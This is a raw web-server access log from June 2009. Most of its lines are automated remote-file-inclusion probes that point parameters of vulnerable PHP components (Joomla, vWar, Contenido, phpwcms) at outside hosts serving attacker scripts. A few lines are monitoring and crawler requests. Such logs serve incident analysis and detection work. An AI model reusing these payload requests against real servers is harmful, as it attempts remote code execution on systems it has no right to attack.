220.231.126.252 - - [20/Jun/2009:01:52:13 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.808"
220.231.126.252 - - [20/Jun/2009:01:52:13 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.808"
210.8.66.19 - - [20/Jun/2009:01:53:08 -0400] "GET /logs/access_log.Q109060300%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:01:53:32 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:01:53:32 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:01:53:32 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:01:53:32 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:01:53:33 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:01:53:33 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:01:53:33 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:01:53:33 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.15.254.22 - - [20/Jun/2009:01:53:36 -0400] "GET /logs/access_log.Q109052100%20%20/index.php?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:01:53:38 -0400] "GET /logs/access_log.Q109050900%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:54:07 -0400] "GET /logs/access_log.Q109052400%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:01:54:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.15.254.22 - - [20/Jun/2009:01:54:34 -0400] "GET /logs/access_log.Q109052100%20%20/index.php?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:54:54 -0400] "GET /logs/access_log.Q109052400%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:55:09 -0400] "GET /logs/access_log.Q109052500%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:55:49 -0400] "GET /logs/access_log.Q109052500%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:01:55:52 -0400] "GET /logs/access_log.Q109060300%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:01:56:17 -0400] "GET /logs/access_log.Q109052800%20%20//components/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:01:56:17 -0400] "GET /logs/access_log.Q109061300%20%20//components/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:01:56:19 -0400] "GET /logs/access_log.Q109050900%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:01:56:24 -0400] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:01:56:24 -0400] "GET /logs/access_log.Q109060200/vwar/convert/mvcw.php?step=1&vwar_root=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:01:56:24 -0400] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:01:56:24 -0400] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:01:56:25 -0400] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:01:56:25 -0400] "GET /logs/access_log.Q109060200/vwar/convert/mvcw.php?step=1&vwar_root=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:01:56:29 -0400] "GET /logs/access_log.Q109052900/vwar/convert/mvcw.php?step=1&vwar_root=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:01:56:34 -0400] "GET /logs/access_log.Q109052900/vwar/convert/mvcw.php?step=1&vwar_root=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
116.125.126.72 - - [20/Jun/2009:01:57:41 -0400] "GET /logs/access_log.Q109052100/index.php?_SERVER[DOCUMENT_ROOT]=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
116.125.126.72 - - [20/Jun/2009:01:57:42 -0400] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
116.125.126.72 - - [20/Jun/2009:01:57:43 -0400] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
66.11.230.36 - - [20/Jun/2009:01:57:48 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:01:57:48 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:01:57:48 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:01:58:06 -0400] "GET //components/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:01:58:09 -0400] "GET /logs//components/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:01:58:09 -0400] "GET /logs/access_log.Q109052400//components/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:01:59:28 -0400] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:01:59:28 -0400] "GET /logs/access_log.Q109060200/vwar/convert/mvcw.php?step=1&vwar_root=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:01:59:28 -0400] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:01:59:28 -0400] "GET /logs/access_log.Q109052900/vwar/convert/mvcw.php?step=1&vwar_root=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:01:59:30 -0400] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:01:59:30 -0400] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:01:59:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.115.58.73 - - [20/Jun/2009:01:59:30 -0400] "GET /logs/access_log.Q109052900/vwar/convert/mvcw.php?step=1&vwar_root=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:01:59:30 -0400] "GET /logs/access_log.Q109060200/vwar/convert/mvcw.php?step=1&vwar_root=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jun/2009:02:00:10 -0400] "GET /logs/access_log.Q109051600%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.805"
123.143.98.5 - - [20/Jun/2009:02:00:15 -0400] "GET /logs/access_log.Q109051600%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.805"
124.0.145.1 - - [20/Jun/2009:02:00:35 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jun/2009:02:00:35 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jun/2009:02:00:35 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:02:00:52 -0400] "GET /logs/access_log.Q109060900/main.php?x=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
116.125.126.72 - - [20/Jun/2009:02:00:56 -0400] "GET /logs/access_log.Q109052100/index.php?_SERVER[DOCUMENT_ROOT]=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
116.125.126.72 - - [20/Jun/2009:02:00:56 -0400] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
116.125.126.72 - - [20/Jun/2009:02:00:57 -0400] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
124.0.145.1 - - [20/Jun/2009:02:01:31 -0400] "GET /logs/error_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
124.138.156.3 - - [20/Jun/2009:02:02:34 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
124.138.156.3 - - [20/Jun/2009:02:02:34 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
124.138.156.3 - - [20/Jun/2009:02:02:34 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:02:02:44 -0400] "GET /logs/access_log.Q109052500//components/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
74.6.17.151 - - [20/Jun/2009:02:03:35 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.17.151 - - [20/Jun/2009:02:03:35 -0400] "GET /scripts/browser_ee.js HTTP/1.0" 200 10423 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.138.156.3 - - [20/Jun/2009:02:04:04 -0400] "GET /logs/error_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
222.122.160.145 - - [20/Jun/2009:02:04:15 -0400] "GET /logs/error_log.Q108072200/convert/mvcw.php?vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
209.59.12.99 - - [20/Jun/2009:02:04:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.11.230.36 - - [20/Jun/2009:02:04:54 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:02:05:03 -0400] "GET /logs/error_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:07:32 -0400] "GET /?path_escape=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:07:32 -0400] "GET /logs/?path_escape=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 200 6242 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:07:32 -0400] "GET /logs/error_log.Q109060700%20%20/?path_escape=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:07:33 -0400] "GET /logs/?path_escape=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 200 6242 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:07:33 -0400] "GET /?path_escape=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:07:33 -0400] "GET /logs/error_log.Q109060700%20%20/?path_escape=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:07:38 -0400] "GET /logs/access_log.Q109060700%20%20/?path_escape=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:07:40 -0400] "GET /logs/access_log.Q109060700%20%20/?path_escape=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:08:11 -0400] "GET /logs/error_log.Q109060700/?path_escape=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
222.122.160.145 - - [20/Jun/2009:02:08:11 -0400] "GET /logs/access_log.Q109061100/convert/mvcw.php?step=1&vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
222.122.160.145 - - [20/Jun/2009:02:08:11 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
222.122.160.145 - - [20/Jun/2009:02:08:12 -0400] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
83.222.193.94 - - [20/Jun/2009:02:08:12 -0400] "GET /logs/access_log.Q109060700/?path_escape=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:08:18 -0400] "GET /logs/error_log.Q109060700/?path_escape=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:08:18 -0400] "GET /logs/access_log.Q109060700/?path_escape=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:02:09:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.122.160.145 - - [20/Jun/2009:02:09:43 -0400] "GET /logs/access_log.Q109060600/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
222.122.160.145 - - [20/Jun/2009:02:09:44 -0400] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
222.122.160.145 - - [20/Jun/2009:02:09:44 -0400] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
220.231.126.252 - - [20/Jun/2009:02:09:48 -0400] "GET /logs/access_log.Q109060200//////////index.php?_REQUEST=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.808"
220.231.126.252 - - [20/Jun/2009:02:09:48 -0400] "GET //////////index.php?_REQUEST=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.808"
220.231.126.252 - - [20/Jun/2009:02:09:48 -0400] "GET /logs//////////index.php?_REQUEST=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.808"
220.231.126.252 - - [20/Jun/2009:02:10:01 -0400] "GET /logs/access_log.Q109060200//////////index.php?_REQUEST=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.808"
220.231.126.252 - - [20/Jun/2009:02:10:01 -0400] "GET //////////index.php?_REQUEST=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.808"
220.231.126.252 - - [20/Jun/2009:02:10:01 -0400] "GET /logs//////////index.php?_REQUEST=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.808"
220.231.126.252 - - [20/Jun/2009:02:10:25 -0400] "GET /logs/access_log.Q109061100//////////index.php?_REQUEST=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.808"
222.122.160.145 - - [20/Jun/2009:02:10:27 -0400] "GET /logs/access_log.Q109051500//?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
222.122.160.145 - - [20/Jun/2009:02:10:27 -0400] "GET //?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
222.122.160.145 - - [20/Jun/2009:02:10:27 -0400] "GET /logs//?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 200 6247 "-" "libwww-perl/5.805"
220.231.126.252 - - [20/Jun/2009:02:10:39 -0400] "GET /logs/access_log.Q109061100//////////index.php?_REQUEST=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.808"
190.144.44.36 - - [20/Jun/2009:02:11:35 -0400] "GET /index.php?sourcedir=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
190.144.44.36 - - [20/Jun/2009:02:11:35 -0400] "GET /logs/access_log.Q109051900/index.php?sourcedir=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
190.144.44.36 - - [20/Jun/2009:02:11:35 -0400] "GET /logs/index.php?sourcedir=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
190.144.44.36 - - [20/Jun/2009:02:11:40 -0400] "GET /logs/access_log.Q109052300/index.php?sourcedir=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.6.17.151 - - [20/Jun/2009:02:12:24 -0400] "GET /logs/error_log.Q108123100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.54 - - [20/Jun/2009:02:12:43 -0400] "GET /images/store_instr_section.jpg HTTP/1.1" 200 26432 "-" "Googlebot-Image/1.0"
88.191.89.138 - - [20/Jun/2009:02:12:45 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/yes.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.813"
88.191.89.138 - - [20/Jun/2009:02:12:45 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/yes.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.813"
88.191.89.138 - - [20/Jun/2009:02:12:45 -0400] "GET /logs/access_log.Q109061200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/yes.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.813"
190.144.44.36 - - [20/Jun/2009:02:13:42 -0400] "GET /logs/access_log.Q109052300%20%20/index.php?sourcedir=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [20/Jun/2009:02:13:54 -0400] "GET /logs/access_log.Q109061000%20%20/index.php?sourcedir=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
88.191.89.138 - - [20/Jun/2009:02:14:29 -0400] "GET /logs/access_log.Q109050800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/yes.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.813"
209.59.12.99 - - [20/Jun/2009:02:14:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.105.207.244 - - [20/Jun/2009:02:14:51 -0400] "GET /logs/access_log.Q109052400%20%20//components/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
222.122.160.145 - - [20/Jun/2009:02:15:34 -0400] "GET /logs/error_log.Q109060200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
200.105.207.244 - - [20/Jun/2009:02:15:56 -0400] "GET /logs/access_log.Q109052500%20%20//components/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:02:16:17 -0400] "GET /logs/access_log.Q109052500//components/com_simpleboard/image_upload.php?sbp=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:02:16:21 -0400] "GET /logs/access_log.Q109052500//components/com_simpleboard/image_upload.php?sbp=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
116.125.126.72 - - [20/Jun/2009:02:17:47 -0400] "GET /logs/error_log.Q109052100/index.php?_SERVER[DOCUMENT_ROOT]=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
222.122.160.145 - - [20/Jun/2009:02:17:51 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
222.122.160.145 - - [20/Jun/2009:02:19:09 -0400] "GET /logs/error_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
209.59.12.99 - - [20/Jun/2009:02:19:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.98.209.71 - - [20/Jun/2009:02:19:47 -0400] "GET /?sourcedir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
